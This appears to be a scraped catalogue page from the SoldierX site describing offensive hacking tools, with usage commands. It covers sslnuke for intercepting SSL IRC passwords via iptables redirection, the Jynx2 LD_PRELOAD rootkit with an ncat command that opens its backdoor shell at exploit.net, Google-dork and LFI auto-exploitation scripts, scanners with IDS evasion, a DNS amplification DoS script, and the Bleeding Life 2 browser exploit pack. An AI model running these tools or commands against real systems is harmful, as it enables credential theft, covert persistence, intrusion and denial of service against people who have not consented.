SOLDIERX.COM Nobody Can Stop Information Insemination

The purpose of sslnuke is to write a tool geared towards decrypting and intercepting "secured" IRC traffic. There are plenty of existing tools that intercept SSL traffic already, but most of these are geared towards HTTP traffic. sslnuke targets IRC directly in order to demonstrate how easy it is to intercept "secured" communications. sslnuke usage is simple.

Usage:

First, add a user account for sslnuke to run as and add iptables rules to redirect traffic to it:

# useradd -s /bin/bash -m sslnuke
# grep sslnuke /etc/passwd
sslnuke:x:1000:1000::/home/sslnuke:/bin/bash
# iptables -t nat -A OUTPUT -p tcp -m owner ! --uid-owner 1000 -m tcp \
--dport 6697 --tcp-flags FIN,SYN,RST,ACK SYN -j REDIRECT --to-ports 4444

Finally, login as sslnuke, build, and run sslnuke:

# su -l sslnuke
# cd sslnuke
# make
# ./sslnuke

Run an IRC client and login to your favorite IRC network using SSL, IRC messages will be printed to stdout on sslnuke.

[*] Received connection from: 192.168.0.5:58007
[*] Opening connection to: 1.1.1.1:6697
[*] Connection Using SSL!
[*] irc.com -> AUTH (1.1.1.1): *** Looking up your hostname...
[*] irc.com -> AUTH (1.1.1.1): *** Found your hostname
[*] irc.com -> victim (1.1.1.1): *** You are connected to irc.com with TLSv1.2-AES256-GCM-SHA384-256bits
[*] 192.168.0.5 -> nickserv (192.168.0.5): id hello
[*] [email protected] -> victim (1.1.1.1): Password accepted - you are now recognized.

sslnuke will automatically detect a client using SSL and determine whether or not to use SSL. The code could also be easily modified to show web site passwords or FTP data, anything using SSL. To attack users on a network, sslnuke can be used in conjunction with an ARP poisoning tool, such as the one found at Blackhat Library or it can be deployed on a gateway.
Mitigation

CryptHook is a modular implementation for securing existing applications with symmetrical block cipher encryption. It works by hooking the base system calls for network communication send/sendto and recv/recvfrom. CryptHook will work with existing applications that rely on these system calls.

Hooking the Calls
Hooking system calls is relatively simple, and is often used to deploy userland rootkits such as Jynx/Jynx2. For this, we're really only interested in hooking four system calls, as previously mentioned. With these hooks, we are able to intercept any data before it is sent across the network (for encryption), and also any data before it touches the client/server application (for decryption).

Example Usage:
As discussed earlier, this can be use with many different client/server applications. As a demonstration, lets add a layer of encryption to SSHd.

Server side:
$ LD_PRELOAD=./crypthook.so UC_KEY=OHarroNSA sshd -p 5000

Client Side:
$ LD_PRELOAD=./crypthook.so UC_KEY=OHarroNSA ssh localhost -p 5000

GScrape is a small perl script that uses Google's Ajax API (Google::Search) to find vulnerable websites.

GScrape is a simple tool, it will look for a file specified by the user containing a list of search terms, query google with those search terms and retrieve an array of websites, which are then tested for Local File Inclusion and SQL injection vulnerabilities, if any are found they are logged to the output file specified by the user.

Example:
perl gscrape.pl -f dork.lst -o gscrape.log

Note:
GScrape will not return any results unless your input file actually contains a list of search terms.

Generates Kolkata fingerprints for web application identification.
Halcyon is a repository crawler that runs checksums for static files found within a given git repository. After performing a change frequency analysis, it begins recording the checksums with the static files updated the most often and works its way down from there. Using checksum data, the application then generates well-formed version fingerprint signatures in YML format, for easy feeding into kolkata. Additionally, signature output includes revision ID, so it may be possible to find an exact commit for the instance of the application in question.

Dependencies:
git repository software

Usage:
The application may be time-intensive, depending on the volume of files that need to be checksummed and the number of revisions that they may have.

usage: halcyon.py [-h] [-c] -u URL -f FILE -m MATCH
[--omit-directory OMIT_DIRECTORY] [-t TOP]

optional arguments:
-h, --help show this help message and exit
-c, --clone Clone the repo first.
-u URL, -p URL, --url URL, --path URL
Path or URL to the repository.
-f FILE, --file FILE File to search for version information
-m MATCH, --match MATCH
Regex to match line with version number (ie: '^\\\$wp_version = \x27([^']+)\x27;$')
--omit-directory OMIT_DIRECTORY
Comma separated list of directories to omit. (Helpful for removing install directories from signature generation)
-t TOP, --top TOP Top 'n' most-frequently-edited files to use. (0 for unlimited)

Example:
python2 halcyon.py -u https://github.com/WordPress/WordPress.git -c -f wp-version.php -m "^\\\$wp_version = \x27([^']+)\x27;$" -t 1

Jynx2 is an expansion of the original Jynx LD_Preload rootkit written in C with several modifications for multi-factor authentication, a more compatible shell drop, and additional hiding features.

Features:
Hiding from netstat
Hiding from ps/top and /proc
File hiding
SSL connect accept() hook
Multi-factor authentication
Improved anti-removal features
SUID Drop-shell with environment variable

Protip: It is possible to make Jynx2 even more difficult to remove by hooking C's link() function, therefore we recommend that any LD_Preload rootkit be removed using a LiveCD.

Usage:
Once Jynx2 is successfully installed on a target machine, accessing it's accept() hook with the default configuration looks like:

[user@host ~]$ sudo ncat exploit.net 80 -p 42 --ssl
DEFAULT_PASS
Bump with shell.
>ls -lia
214473 drwxr-xr-x 2 user users 176 Mar 7 19:19 .
177137 drwxr-xr-x 15 user users 952 Mar 5 22:15 ..

Protip: Make sure to using the --ssl flag with ncat, otherwise Jynx2 will not accept the connection, with the connection's file descriptor being passed to the backdoored service in stead.

Vanguard is an extensible utility with module support built for testing different types of web exploitation on a given domain.
Features

Main application features:
Fully Configurable
WebCrawlers crawl all open HTTP and HTTPS ports output from nmap
LibWhisker2 For HTTP IDS Evasion (Same options as nikto)
Tests via GET,POST, and COOKIE

Web penetration tests:
SQL injection (This test is signature free!)
LDAP Injection
XSS
File inclusion
Command Injection

Usage:
perl scan.pl -h [hostname] -e [evasion option]

Application Dependencies:

Notice: You must run this application as root.
You must have nmap from http://nmap.org installed to run this application correctly.
Protip: You can undo the root requirement by removing the check for root and modifying the nmap configuration.

Perl Dependencies:
LibWhisker2 requires Net::SSLeay. You may need to get this from cpan, compile it in, or install it from your distribution's package manager.
YAML
Clone
Notice: You can install these libraries with cpan.

Kolkata is a web application fingerprinting engine written in Perl that combines cryptography with IDS evasion. Kolkata uses session splicing for IDS evasion and configurable checksums of static files in order to determine the version of a web application.

Dependencies
LibWhisker2 - This comes bundled in the tarball, with nikto, and a variety of other tools on this site.
YAML::XS - Install with cpan in bash (cpan -i YAML::XS)

Usage
kolkata.pl -d domain.tld [-v -p [remote_path_to_web_application]]

kolkata requires a directory called sigs in its directory
The sigs directory must contain properly formatted yml files with checksums.

This script works by crafting packets being sent to a DNS server that allows for recursion, the attacker can make a normal query that is 64 bytes in size, return a response that is tens of times larger than the original request.
More information can be seen at:
blog.cloudflare.com/the-ddos-that-almost-broke-the-internet

#
# DNS Amplification DOS Attack Script - Proof of Concept
#
# Co-Authored Johnathin Ferretti and Pat Litke
#
# Pat Litke | geudrik
# Jonathin Ferretti | LISTERINe
#
# January 2012
#
#
#
# Dependencies
# python-scapy
# python-dnspython
#
#

This script will attempt to gain code execution on sites vulnerable to local file inclusion via an httpd error log or by modifying the user-agent and including a file containing environment variables. The php code execution test is performed using an arithmetic challenge, and the script uses system() as its php execution function. The fact that every part of this process is randomized including the math challenge prevents signature based detection while LibWhisker provides IDS Evasion.

Features
Signature-free
Session Splicing
User-Agent and Log injection
Arithmetic Test

Usage
perl lfi_autopwn.pl -h www.vuln.tld -u "/vuln.ext?page=main&foo=bar" -i page

Bleeding Life 2 is an exploit pack that affects the web browsers on the Microsoft Windows operating system with remote code execution buffer overflows.